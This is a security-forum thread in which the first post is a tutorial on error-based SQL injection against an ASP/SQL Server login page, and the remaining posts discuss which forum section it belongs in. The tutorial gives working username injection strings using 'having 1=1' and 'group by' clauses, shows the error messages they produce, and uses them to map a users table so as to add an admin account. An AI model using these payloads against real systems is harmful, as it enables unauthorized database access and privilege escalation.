SQL error messages - advantageous
Results 1 to 5 of 5

Thread: SQL error messages - advantageous

  1. #1
    Senior Member IcSilk's Avatar
    Join Date
    Aug 2001
    Posts
    296

    SQL error messages - advantageous

    This technique was first discovered by David Litchfield
    and the author in the course of a penetration test;
    David later wrote a paper on the technique, and subsequent authors
    have referenced this work. This explanation discusses the mechanisms
    underlying the 'error message' technique, enabling one to fully
    understand it, and potentially originate variations of their own.

    So I am giving credit where it is due ............

    Lets do it - Our 'users' table may have been created with the following command:

    create table users (id int,
    username varchar(255),
    password varchar(255),
    privs int
    )




    and the users inserted:

    insert into users values(0, 'admin', 'r00tr0x!', 0xffff)

    insert into users values (0, 'guest', 'guest', 0x0000)

    insert into users values (0, 'chris', 'password', 0x00ff)

    insert into users values (0, 'frank', 'sesame', 0x00ff)

    Ok, so we want to insert a user account for ourself. Without knowing the structure of the 'users' table, we are unlikely to meet with success. Even if luck is with us the significance of the 'privs' field is unclear. We might insert a '1' and give ourself a low-privileged account when we really wanted administrative access.

    Fortunately, if we have 'Error messages'- default ASP structure (yes I did say fortunately - there is good in them sometimes) we can determine the entire structure of the DB ---

    First we want to establish the names of the tables that the query operates on, and the names of the fields:

    Username: ' having 1=1--

    and we get this error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]column 'users.id' is invalid in the select list vecause ot is not contained in an aggregate function and there is o GROUP BY clause.

    /process_login.asp, line 35


    So we now know the table name and column name of the first column and can continue throught the columns one field at a time using 'Group By'.

    Username: 'group by users.id having 1=1--

    And we get this error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

    /process_login.asp, line 35


    Eventually we arrive at the following 'username':

    ' group by users.id, users.username, users.password, users.privs having 1=1--

    We get here no errors and it is (at least functionally) equivalent to:

    select * from users where username = ''

    So we now know that the query is referencing only the 'users' table, and is using the columns 'id, username, password, privs' - respectively.

    Of course it would be useful to figure out the types of each column, too.

    I'v been up for about 60 hours straight and that will have to wait until part II.
    "In most gardens they make the beds too soft - so that the flowers are always asleep" - Tiger Lily

  2. #2
    AFLAAACKKK!!
    Join Date
    Apr 2004
    Posts
    1,065
    I actually think this tutorial belongs in the security tutorials section...
    I am the uber duck!!1
    Proxy Tools

  3. #3
    Senior Member IcSilk's Avatar
    Join Date
    Aug 2001
    Posts
    296

    If thats the case .....

    If that is where it belongs then my apologies.

    thought it was more miscellaneous than that. If the admin want it in the other forum I hope they put it there as Im not able to change it myself ........ I don't think .....
    "In most gardens they make the beds too soft - so that the flowers are always asleep" - Tiger Lily

  4. #4
    T̙͓̞̣̯ͦͭͅͅȂͧͭͧ̏̈͏̖̖Z̿ ͆̎̄
    Join Date
    Dec 2004
    Posts
    3,171
    IcSilk,

    If you want to move it all you have to do is delete the thread by deleting the first post and open a new thread in the zone you wish.

    copy...delete...move...open...paste...done

    but I'd do it before you get alot of posts because when you delete your first post all other posts get deleted too.

    Eg

  5. #5
    Senior Member IcSilk's Avatar
    Join Date
    Aug 2001
    Posts
    296
    Cheers Egaladiest ........ think Ms mittens or one of the others Mods took care of this one though - I was still in a quandary as to whether it should be moved or not ... so I refrained - I'll keep it in mind though - theres bound to be a next time.
    "In most gardens they make the beds too soft - so that the flowers are always asleep" - Tiger Lily

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides